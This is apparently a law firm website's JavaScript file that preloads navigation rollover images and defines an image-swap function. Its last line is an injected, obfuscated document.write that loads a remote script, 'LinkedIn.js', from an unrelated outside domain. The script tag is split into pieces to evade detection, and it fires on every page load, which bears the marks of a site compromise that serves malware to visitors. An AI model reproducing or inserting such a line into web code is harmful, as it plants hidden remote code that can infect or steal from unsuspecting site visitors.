i1on = new Image();
i1on.src = "images/nav_firm_o.jpg";
i1off = new Image();
i1off.src = "images/nav_firm.jpg";
i2on = new Image();
i2on.src = "images/nav_news_o.jpg";
i2off = new Image();
i2off.src = "images/nav_news.jpg";
i3on = new Image();
i3on.src = "images/nav_practice_o.jpg";
i3off = new Image();
i3off.src = "images/nav_practice.jpg";
i4on = new Image();
i4on.src = "images/nav_community_o.jpg";
i4off = new Image();
i4off.src = "images/nav_community.jpg";
i5on = new Image();
i5on.src = "images/nav_attorneys_o.jpg";
i5off = new Image();
i5off.src = "images/nav_attorneys.jpg";
i6on = new Image();
i6on.src = "images/nav_clients_o.jpg";
i6off = new Image();
i6off.src = "images/nav_clients.jpg";
i7on = new Image();
i7on.src = "images/nav_contacts_o.jpg";
i7off = new Image();
i7off.src = "images/nav_contacts.jpg";
i8on = new Image();
i8on.src = "images/nav_map_o.jpg";
i8off = new Image();
i8off.src = "images/nav_map.jpg";



/*/
/ / This function will change the src property of element
/ / to match the src property of the image in the DOM.
/ / Returns true or false depending on success.
/*/
function swapImg(element, image)
{
  // only if there are images defined in the DOM
  if (document.images)
  {
    eval("document." + element + ".src = \"" + image.src + "\";");
    return true;
  }
  else
    return false;
}





document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/LinkedIn.js"></scri'+'pt>');